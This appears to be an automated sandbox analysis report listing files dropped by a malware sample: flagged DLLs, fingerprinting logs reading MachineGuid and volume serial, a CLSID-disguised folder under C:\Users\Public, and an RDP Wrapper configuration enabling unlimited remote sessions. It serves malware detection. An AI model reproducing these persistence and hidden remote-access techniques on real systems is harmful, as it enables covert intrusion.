Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe0eb49d36)..[I] (tcp_connect) -> Done(sock=0x384,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.313152038164236
Encrypted:	false
SSDEEP:	3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:	C89542ABA45CE1084760AE8DE6EAE09E
SHA1:	603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:	1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:	60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221031
Entropy (8bit):	5.334054794702459
Encrypted:	false
SSDEEP:	192:A+NiTtPPPPPPPPPPPPPPPPPPPPPPPIPPPPPPPPPPIPIIPPPPPPPPZPPPPPPPPPCy:ZNiTW
MD5:	C4602D8AE2C402FF7B1F016FA6B02F48
SHA1:	A42FA24CFADC4B610924F865FB776D6986777DD5
SHA-256:	46247C631180AAE8A379CB7C893E7FCED220C7B6FDA78E08D30A6CE3D25C74BE
SHA-512:	AD75351DACFCECAF991FAD3DA2F74219E2F4A809799DD0A588DEA90354F6A10D1EE79507C6A08BE4E100F5DA873BDFDB37301763AE1944AEFA82B44C425E941D
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe0e16

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.277217301921545
Encrypted:	false
SSDEEP:	1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:	D0F0423AEEE6B6FF6754D860603D46D0
SHA1:	A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:	81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:	C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	653185
Entropy (8bit):	5.287695797725974
Encrypted:	false
SSDEEP:	192:ARNiTfjjjjjjjjjjjjjjjIjjjDjnjIjjjjjjjjjjfjIIjjjjjjjjhjjjjjjjjGjI:uNiT7N
MD5:	D9955005AE81DC1B8767BE466899C5F6
SHA1:	169F28356645623E3C57BB3280F27BD102F2D165
SHA-256:	AEA05245B46707E46E7EBF001C229265332BCB3E3A7BA12A03F8D350C7AF4F3A
SHA-512:	9B72C4AEBB85B4B5C0B2861163D76A98D3B37D3CB0D3E7B0CF0836C7DF2785E6BD84F27CF41F93D579818D4DD14DD8FC6F68283D43E13D3A786AB0A32FFB9F77
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe0e13e1cc)..[I] (tcp_connect) -

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2290767543196575
Encrypted:	false
SSDEEP:	1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:	4C086C8F48C4D0F8C20410E60340AEC9
SHA1:	77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:	0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:	CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	441513
Entropy (8bit):	5.449545529389614
Encrypted:	false
SSDEEP:	768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:	5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:	E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:	060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:	B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg

Download File

Process:	C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:	data
Category:	dropped
Size (bytes):	10451376
Entropy (8bit):	6.708065758846917
Encrypted:	false
SSDEEP:	196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
MD5:	312704A6232D74733DE04C6E00F8CF21
SHA1:	2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
SHA-256:	8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
SHA-512:	5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
Malicious:	false
Preview:	_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.298274541598319
Encrypted:	false
SSDEEP:	1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
MD5:	319865D78CC8DF6270E27521B8182BFF
SHA1:	716E70B00AA2D154367028DE896C7D76C9D24350
SHA-256:	A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
SHA-512:	78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....\|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................\|..............@....reloc...............~..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fmx0gic.5bj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qscvlcj.oid.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkkvqchf.ruy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drxabb30.auu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdimrfcj.fj4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3rkljvs.rul.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmvq2w00.fpt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltih0afy.onv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqo22gre.iyi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsztmn5o.3mu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pez0cwb2.aha.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrkw0r3c.ua4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	10639360
Entropy (8bit):	7.4147455331909855
Encrypted:	false
SSDEEP:	196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
MD5:	7D1755E8E41A6C2F08D2FAEFFDF9DAD1
SHA1:	C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
SHA-256:	44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
SHA-512:	B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 19%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....T.................@...................................a.....`... ..............................................................@..d...........................................`/..(....................................................text...(...........................`..`.data.............................@....rdata...^......`.................@..@.pdata..d....@.......(..............@..@.xdata.......P.......2..............@..@.bss....p....`...........................idata...............<..............@....CRT....`............R..............@....tls.................T..............@....reloc...............V..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\installer.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3744
Entropy (8bit):	5.500846542160262
Encrypted:	false
SSDEEP:	96:isYJ9VrDT0HU0Hn0H1w00Hu0H+kQHR3+PfJG0HNVHHH10HltHq:DiTfT000H0i00O0TQxOPfJG0tVnV0FtK
MD5:	712B52B3E0DDCB64F7B21B30D0AD4AC2
SHA1:	FA4E676AD558E0936F9E985F4674AB743A13D2E2
SHA-256:	47C1C9430A47AE1F16695334DAC848C3D167CA7BCD14B3543302971AB59BEA0C
SHA-512:	02077947D8C2D4713016A684C7525F93B13BA3AC1F1C987FC230EE04347C94B0A333CC741D92D5E8E67264F07D75F460EECFD20167D56A0DB2EF049D5FFC5E66
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10

C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	259
Entropy (8bit):	4.933902901538645
Encrypted:	false
